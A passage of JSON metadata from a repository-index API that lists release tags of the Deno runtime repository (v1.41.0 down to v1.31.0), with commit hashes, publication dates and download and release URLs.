https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.40.3","sha":"887fd59486325ad99c183955b35fec07fd45516c","kind":"commit","published_at":"2024-02-01T06:27:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/den